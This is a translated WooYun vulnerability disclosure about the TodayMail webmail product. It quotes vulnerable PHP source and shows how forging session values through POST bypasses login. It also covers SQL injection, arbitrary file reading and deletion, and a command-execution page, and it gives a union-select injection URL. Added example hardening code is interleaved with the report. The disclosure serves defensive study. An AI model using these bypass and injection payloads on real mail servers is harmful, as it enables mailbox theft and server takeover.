
Vulnerability summary

Defect ID: wooyun-2016-0188026

Title: Flaws in the TodayMail mail system lead to multiple vulnerabilities (arbitrary mail reading / SQL injection / command execution / arbitrary file deletion)

Vendor: 广东时代互联科技有限公司

Author: 路人甲

Submitted: 2016-03-23 11:05

Fixed: 2016-06-21 12:00

Published: 2016-06-21 12:00

Vulnerability type: remote code execution

Severity: high

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-03-23: details sent to the vendor, awaiting vendor handling
2016-03-23: vendor confirmed; details visible to the vendor only
2016-03-26: details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2016-05-17: details disclosed to core white hats and domain experts
2016-05-27: details disclosed to regular white hats
2016-06-06: details disclosed to intern white hats
2016-06-21: details disclosed to the public

Brief description:

PS: example cases have been added as requested by the reviewers.
Flaws in the TodayMail mail system lead to multiple vulnerabilities (arbitrary mail reading / N SQL injections / command execution / arbitrary file deletion); no login is required, giving a shell directly.
http://www.wooyun.org/bugs/wooyun-2014-063422
The source code was obtained from this report (leaked earlier).

Detailed description:

http://**.**.**.**/bugs/wooyun-2014-063422
The source code was obtained from this report (leaked earlier).
Inside the webmail\main folder, every script starts by loading the following:

<?php
/*-
* PROMailVIP webmail
*
* Copyright (c) 1999-2001 by PROMailVIP network system Inc.
* All rights reserved.
* Author: Sanry William <sanry@**.**.**.**>
*
* $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
* modify by keenx 2005.3.9
*/
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";


Of these, login_inc.php is the core permission-check file:

<?php
/*-
* PROMailVIP webmail
* Copyright (c) 1999-2004 by PROMailVIP network system Inc.
* All rights reserved.
* Author: sanry <sanry@**.**.**.**>
* $Id: login_inc.php,v 1.8 2004/07/02 03:09:52 sanry Exp $
* All files have been moved into subfolders, so Location: ../login.php is used. 2005-9-2 keenx
*/
if(!defined("INCLUDE_LOGIN_OK")) {
defined("INCLUDE_LOGIN_OK");
session_start();
$G_USERNAME = $_SESSION['G_USERNAME'];
//echo $G_USERNAME;
$G_DOMAIN = $_SESSION['G_DOMAIN'];
$G_HOME = $_SESSION['G_HOME'];
//$G_TIME = $_SESSION['G_TIME'];
//$G_QUOTA = $_SESSION['G_QUOTA'];
$G_NICKNAME = $_SESSION['G_NICKNAME'];
$G_ID = $_SESSION['G_ID'];
$G_LANG = $_SESSION['G_LANG'];
$G_TEMP = $_SESSION['G_TEMP'];
if ( !$G_USERNAME ){
echo "<script language=\"javascript\">window.top.location.href='../login.php';</script>";
// header("Location: ../login.php");
exit();
/*
if ( !$G_USERNAME || !$G_DOMAIN || !$G_HOME || !$G_TIME|| !$G_QUOTA ){
header("Location: login.php");
exit();
*/
}
} // End of INCLUDE_LOGIN_OK
?>


From the above, the $G_USERNAME variable is the only factor controlling the whole mail-login process, and $G_USERNAME is populated from the session, so on its own this cannot be bypassed.
Auditing all of the code, however, turned up the following locations:
webmail/main/mailcurlapi.php
webmail/main/sendstatusapi.php

<?php
header("Content-Type: text/html;charset=utf-8");
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../../core/send.class.inc.php";
set_time_limit(0);
session_start();
$G_USERNAME = $_SESSION['G_USERNAME'] = $_POST['G_USERNAME'] ? $_POST['G_USERNAME'] : 'monitor';
$G_DOMAIN = $_SESSION['G_DOMAIN'] = $_POST['G_DOMAIN'] ? $_POST['G_DOMAIN'] : '**.**.**.**';
$_SESSION['G_HOME'] = $_POST['G_HOME'] ? $_POST['G_HOME'] : '/tmdomains/m/**.**.**.**/monitor';
$_SESSION['G_NICKNAME'] = $_POST['G_NICKNAME'] ? $_POST['G_NICKNAME'] : 'monitor';
$G_ID = $_SESSION['G_ID'] = $_POST['G_ID'] ? $_POST['G_ID'] : '4458';
$_SESSION['G_LANG'] = $_POST['G_LANG'] ? $_POST['G_LANG'] : 0;
$_SESSION['G_TEMP'] = NULL;
include_once "../include/login_inc.php";// login and other security checks
$value = $_POST['sendto'];
$subject = $_POST['subject'];
$content = $_POST['content'];
if(!$value){echo '没有邮箱';exit;}


Here the session values are written directly from POST data, and only afterwards does

include_once "../include/login_inc.php";// login and other security checks

perform the permission check.
What kind of logic is this? It means the mailbox authentication is bypassed outright: one can log straight into a mailbox, which allows arbitrary mail reading.
So every back-end page operation can be reached by assigning the session values this way.
I. Arbitrary mail reading
Submitting G_USERNAME, G_DOMAIN, G_HOME, G_NICKNAME and G_ID via POST is enough to bypass the login for anyone's mailbox.
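As an added example (not TodayMail's code), this is how the login check and the two API entry points could be hardened: the logged-in state comes only from a flag that the login step writes server-side, and the API scripts authenticate the internal caller with a shared secret instead of copying G_USERNAME/G_ID from POST into the session. The 'login_ok' flag and $CFG_API_SECRET are assumed names.

```php
<?php
// Added example, not TodayMail code. Hardened replacements for the
// login_inc.php check and for the head of mailcurlapi.php /
// sendstatusapi.php. 'login_ok' and $CFG_API_SECRET are assumed names.
declare(strict_types=1);

// Called by login.php (not shown on the page) once the password has been
// verified. This is the only code path that marks a session as logged in,
// and it replaces the whole session so nothing pre-login survives.
function markSessionAuthenticated(int $id, string $user, string $domain, string $home): void
{
    session_regenerate_id(true);
    $_SESSION = [
        'login_ok'   => true,
        'G_ID'       => $id,
        'G_USERNAME' => $user,
        'G_DOMAIN'   => $domain,
        'G_HOME'     => $home,
    ];
}

// Replacement for the test in login_inc.php. Kept pure so it can be
// unit-tested: the caller passes $_SESSION and redirects on false.
function sessionIsAuthenticated(array $session): bool
{
    return ($session['login_ok'] ?? false) === true
        && isset($session['G_ID'], $session['G_USERNAME'])
        && is_int($session['G_ID']);
}

// Replacement for the head of the API scripts. The internal monitor caller
// proves itself with a secret from config_inc.php, compared in constant
// time; the account it acts as is fixed here (defaults taken from the page)
// and no request field is ever copied into $_SESSION.
function apiContext(array $post, string $configuredSecret): ?array
{
    $presented = (string) ($post['api_secret'] ?? '');
    if ($configuredSecret === '' || !hash_equals($configuredSecret, $presented)) {
        return null;                         // caller responds 403 and exits
    }
    return ['G_ID' => 4458, 'G_USERNAME' => 'monitor', 'G_NICKNAME' => 'monitor'];
}

// Self-check with constructed inputs: the forged POST body that defeated
// the original code now neither logs in nor selects a victim account.
$forged = ['G_USERNAME' => 'victim', 'G_DOMAIN' => 'example.test', 'G_ID' => '1'];
assert(sessionIsAuthenticated($forged) === false);     // no server-set flag
assert(apiContext($forged, 'correct-secret') === null); // no/wrong api_secret
$ctx = apiContext(['api_secret' => 'correct-secret', 'G_ID' => '1'], 'correct-secret');
assert($ctx !== null && $ctx['G_ID'] === 4458);         // POST G_ID ignored
```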
II. SQL injection (10 examples analysed)
1. webmail/tools/getpopmail.php

<?php
/*-
* PROMailVIP webmail
*
* Copyright (c) 1999-2001 by PROMailVIP network system Inc.
* All rights reserved.
* Author: Sanry William <sanry@**.**.**.**>
*
* $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
* modify by keenx 2005.3.9
*/
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
//get
$get_Cmd = trim($_GET['Cmd']);
$popid=trim($_GET['popid']);
$EmailCore = new EmailCore($G_ID);
if($get_Cmd=='Get')
{
$Total = $EmailCore->getPOPTotal();
if($popid=='all')
$POPList = $EmailCore->getPOPList(1);
else $POPList=$EmailCore->getPOPlist(1,1," and popid=$popid");
if(!$POPList){
echo $LANG_POP_NOT_MAIL.'!<a href="../setting/setpopmail.php" style="color:#0000FF">'+$LANG_POP_CILCK_ADD+'</a>';
}


popid is the injection point.
2. webmail\tools\cardList.php

<?php
header("Content-Type: text/html; charset=utf-8");
$DEBUG = 1;
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
// rows shown per page: 10
$CFG_ADDR_NUMPERPAGE = 10;

///// search list
$key = mysql_real_escape_string($_REQUEST['key']);
if ($key) $sql_plus = " AND (name LIKE '%$key%' or cname LIKE '%$key%' or email LIKE '%$key%' or ".
"addr LIKE '%$key%' or job LIKE '%$key%' or tel LIKE '%$key%' or mobile LIKE '%$key%' or note LIKE '%$key%') ";
else
$sqlwhere = "";

////// sort handling
if($_REQUEST[sort_by]) $orderby = "order by $_REQUEST[sort_by] asc";
if(!$orderby) $orderby = "order by cardid desc";
$EmailCore = new EmailCore($G_ID);
///// full list


$_REQUEST[sort_by] is injected unescaped; this is an ORDER BY injection.
3. webmail\tools\cardCmd.php

<?php
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
$get_Cmd = $_REQUEST[cmd];
$CardID = $_REQUEST[cardid];
$EmailCore = new EmailCore($G_ID);
if(!preg_match("/[0-9]/",$_REQUEST[agid]))$_REQUEST[agid]='';
if($get_Cmd == "add")
{
$CardInfo = array();
$CardInfo['name'] = $_REQUEST[name];
$CardInfo['cname'] = $_REQUEST[cname];
$CardInfo['addr'] = $_REQUEST[addr];
$CardInfo['job'] = $_REQUEST[job];
$CardInfo['tel'] = $_REQUEST[tel];
$CardInfo['PhoneNum'] = $_REQUEST[PhoneNum];
$CardInfo['email'] = $_REQUEST[email];
$CardInfo['ag_id'] = $_REQUEST[agid];
$CardInfo['note'] = $_REQUEST[note];
$res = $EmailCore->insertAddress($CardInfo);
}


Following the insertAddress method:

function insertAddress($addressInfo){
foreach($addressInfo as $key=>$val) {
$key = mysql_real_escape_string($key);
$val = mysql_real_escape_string($val);
if($key=="ag_id"){
if($val!="") $sql_plus .= ", $key=$val";
else $sql_plus .= ", $key=null";
}
else $sql_plus .= ", $key='$val'";
}
$sql="insert into address set ftm_id=".$this->TMID.$sql_plus;
$this->mysql->query($sql);
return true;
}


Here $this->TMID is again the value from the session we forged earlier:

new EmailCore($G_ID);


$G_ID is a value under our control, so this is injectable as well.
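An added example (not the project's code) of parameterised replacements for the three query fragments shown in this section: popid bound as an integer, sort_by mapped through an allow-list because identifiers cannot be bound, and insertAddress() built from fixed column names with the session's ftm_id passed as a typed parameter. The table name popmail and the full address schema are assumptions; only popid, cardid and address.ftm_id appear on the page.

```php
<?php
// Added example, not TodayMail code. The 'popmail' table and the address
// columns beyond those visible on the page are assumptions.
declare(strict_types=1);

// getpopmail.php: replaces " and popid=$popid" with a bound parameter.
function fetchPopAccounts(PDO $db, int $tmid, string $popid): array
{
    $sql    = 'SELECT * FROM popmail WHERE ftm_id = :tmid';
    $params = [':tmid' => $tmid];
    if ($popid !== 'all') {
        if (!ctype_digit($popid)) {
            throw new InvalidArgumentException('popid must be numeric or "all"');
        }
        $sql .= ' AND popid = :popid';
        $params[':popid'] = (int) $popid;
    }
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// cardList.php: a column name is an identifier, so it is looked up in an
// allow-list; anything else falls back to the script's default order.
function orderByClause(?string $sortBy): string
{
    $allowed = ['name', 'cname', 'email', 'tel', 'mobile', 'job', 'cardid'];
    return in_array($sortBy, $allowed, true) ? "ORDER BY `$sortBy` ASC" : 'ORDER BY cardid DESC';
}

// emailcore insertAddress(): column names come from a fixed list, values are
// bound, ag_id is NULL or an integer, and ftm_id is never string-concatenated.
function insertAddress(PDO $db, int $tmid, array $card): void
{
    $columns = ['name', 'cname', 'addr', 'job', 'tel', 'PhoneNum', 'email', 'ag_id', 'note'];
    $cols = ['ftm_id']; $marks = [':ftm_id']; $params = [':ftm_id' => $tmid];
    foreach ($columns as $c) {
        if (!array_key_exists($c, $card)) continue;
        $cols[]  = "`$c`";
        $marks[] = ":$c";
        if ($c === 'ag_id') {
            $params[":$c"] = ($card[$c] === '' || $card[$c] === null) ? null : (int) $card[$c];
        } else {
            $params[":$c"] = (string) $card[$c];
        }
    }
    $stmt = $db->prepare('INSERT INTO address (' . implode(', ', $cols) . ') VALUES (' . implode(', ', $marks) . ')');
    $stmt->execute($params);
}

// Self-check against an in-memory SQLite database with a constructed schema.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE popmail (ftm_id INTEGER, popid INTEGER, server TEXT)');
$db->exec("INSERT INTO popmail VALUES (4458, 1, 'pop.example.test')");
$db->exec('CREATE TABLE address (ftm_id INTEGER, name TEXT, cname TEXT, addr TEXT, job TEXT, tel TEXT, PhoneNum TEXT, email TEXT, ag_id INTEGER, note TEXT)');
assert(count(fetchPopAccounts($db, 4458, '1')) === 1);
assert(orderByClause('cardid desc,(select 1)') === 'ORDER BY cardid DESC');
insertAddress($db, 4458, ['name' => "O'Brien", 'ag_id' => '', 'note' => "1' or 1=1"]);
assert($db->query('SELECT COUNT(*) FROM address WHERE ftm_id = 4458 AND ag_id IS NULL')->fetchColumn() == 1);
try {
    fetchPopAccounts($db, 4458, '1 and 1=2 union select 1');   // the page's payload shape
    assert(false);
} catch (InvalidArgumentException $e) { /* rejected before reaching the database */ }
```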
III. Arbitrary file deletion
webmail\main\doAction.php

case "del":
$name=(isset($_POST['name']) and $_POST['name'])?$_POST['name']:"";
$EmailCore->deleteAttach($name,$sendBasePath);


Following the deleteAttach method:

function deleteAttach($filename,$sendBasePath='')
{
if(!$sendBasePath) $sendBasePath = $this->getTMBasePath()."/sendfile/attach/".session_id();
$listattachfile = "$sendBasePath/list_attach";
$listattachfileTEMP = "$sendBasePath/list_attach_tmp";
($FD_LIST_ATTACH = fopen($listattachfile,"r")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfile!");
($FD_LIST_ATTACH_TEMP = fopen($listattachfileTEMP,"w")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfileTEMP!");
while( $buff = fgets($FD_LIST_ATTACH,1024) ){
list($name,$size,) = preg_split("/\t/",$buff,3);
if ($name!=$filename) fputs($FD_LIST_ATTACH_TEMP,$buff);
}
fclose($FD_LIST_ATTACH);
fclose($FD_LIST_ATTACH_TEMP);
if(file_exists("$sendBasePath/$filename")) unlink("$sendBasePath/$filename");
unlink($listattachfile);
rename($listattachfileTEMP, $listattachfile);
}


IV. Command execution

<?
//by sanry 2005.07.01 v1.0
//last modify by frank 2005-07-11 11:52

include "security.inc.php";
if(!$cmd)$cmd="ls";
?>
<html>
<table>
<tr>
<td>
<a href="<?=$PHP_SELF?>?cmd=ifconfig">��������</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=dmesg">��Ӳ��״̬</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=netstat -n">�������</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=uptime">CPU״̬</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=ps aux">�����б�</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=lsof">���ļ��б�</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=df">��������</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=free">�ڴ�ʹ��</a>&nbsp;
<a href="<?=$PHP_SELF?>?cmd=cat /var/log/boot.msg">����ռ�</a>
</td>
</tr>
<tr>
<td>
<form action="<?=$PHP_SELF?>">
<input type=submit value="����">
<input type=text name="cmd" size="100" value="<?=$cmd?>">
</form>
</td>
</tr>
</table>
<textarea rows="50" style="width:90%"><?system($cmd);?></textarea>
</html>


The only protection is include "security.inc.php";, whose contents are:


require_once("../api/netaddr/ipcheck.inc.php");
$ipcheck=new IPCheck();
$arrnew=array(
"0"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
"1"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
"2"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
"3"=> array("ip"=>"**.**.**.**", "mask"=>"**.**.**.**"),
"4"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
"5"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
"6"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
"7"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
);

$ipcheck->setipfilters($arrnew);
//echo "REMOTE_ADDR: ".$REMOTE_ADDR."<br>"; //tesing,add by frank 2005-07-27 15:29
if(!$ipcheck->checkip($_SERVER[REMOTE_ADDR]) ){
echo "authorization is permission error($_SERVER[REMOTE_ADDR])";
exit;
}
?>


V. Arbitrary file reading
mail\webmail\main\mime.php

<?php
/*-
* PROMailVIP webmail
*
* Copyright (c) 1999-2001 by PROMailVIP network system Inc.
* All rights reserved.
* Author: Sanry William <sanry@**.**.**.**>
*
* $Id: mime.php,v 1.8 2003/05/16 00:36:29 sanry Exp $
* Modify by keenx 2005-7-19
*/
ob_start();
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../language/utf8_inc.php";
include_once "../include/mimeType.php";
//get
foreach($_REQUEST as $key=>$val){
$$key=trim($val);
}
$get_File = rawurldecode($_REQUEST['File']);
$get_Cmd = $_REQUEST['Cmd'];
$get_ID = $_REQUEST['id'];
$EmailCore = new EmailCore($G_ID);
$BodyInfo = $EmailCore->getBodyInfo();
if ($get_Cmd=="ShowByMD5"){
ob_end_clean();
@mysql_close($db);
@mysql_close($db_remote);
$filePath = $EmailCore->getTMBasePath().'/sendfile/attach/'.session_id().'/'.$get_File;
if(is_file($filePath)){
echo file_get_contents($filePath);
exit;
}
$filePath = $EmailCore->getTMBasePath().'/bodyfile/'.$get_File;
if(is_file($filePath)){
echo file_get_contents($filePath);
exit;
}
exit;
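An added example (not the project's code) that covers both the deleteAttach() call in section III and the ShowByMD5 branch of mime.php in section V: the request-supplied name is reduced to a single path component and the resolved path is checked to stay inside the attachment directory before unlink() or readfile() runs. deleteAttachSafe() and showAttachSafe() are hypothetical names; the list_attach bookkeeping of the original is left out.

```php
<?php
// Added example, not TodayMail code. Containment check for the two file
// operations above; function names are hypothetical.
declare(strict_types=1);

// Returns the absolute path of $name inside $baseDir, or null unless the
// request names an existing regular file directly in $baseDir.
function containedFile(string $baseDir, string $name): ?string
{
    // Attachment names are flat: reject separators and dot entries outright.
    if ($name === '' || $name !== basename($name) || $name === '.' || $name === '..') {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // realpath() resolves symlinks, so a link pointing outside is caught too.
    return strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $path : null;
}

// doAction.php "del": delete only a contained file, never the index files.
function deleteAttachSafe(string $sendBasePath, string $name): bool
{
    if (in_array($name, ['list_attach', 'list_attach_tmp'], true)) {
        return false;
    }
    $path = containedFile($sendBasePath, $name);
    return $path !== null && unlink($path);
}

// mime.php "ShowByMD5": serve only a contained file, with a fixed MIME type.
function showAttachSafe(string $baseDir, string $name): bool
{
    $path = containedFile($baseDir, $name);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    header('Content-Type: application/octet-stream');
    readfile($path);
    return true;
}

// Self-check on a constructed temporary attachment directory.
$dir = sys_get_temp_dir() . '/attach_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/report.pdf", 'constructed attachment');
assert(containedFile($dir, 'report.pdf') === realpath("$dir/report.pdf"));
assert(containedFile($dir, '../../etc/passwd') === null);        // traversal
assert(containedFile($dir, '..') === null);
assert(deleteAttachSafe($dir, 'list_attach') === false);          // index protected
assert(deleteAttachSafe($dir, 'report.pdf') === true && !file_exists("$dir/report.pdf"));
rmdir($dir);
```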


Demonstration:
By default, visiting http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1

[screenshot: 11.png]

redirects to the login page, so we first populate the session as follows:

[screenshot: 22.png]

Visiting again:

[screenshot: 33.png]

http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1 and 1=2 union select 1,2,3,4,user(),6,7,8

[screenshot: 44.png]

[screenshot: 777.png]

Example cases

[screenshot: 666.png]

All the mail hosts were enumerated by writing a crawler:

Proof of vulnerability: (identical to the detailed description above)


Fix recommendation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability rank: 5

Confirmed: 2016-03-23 11:53

Vendor reply:

Thanks

Latest status:

None yet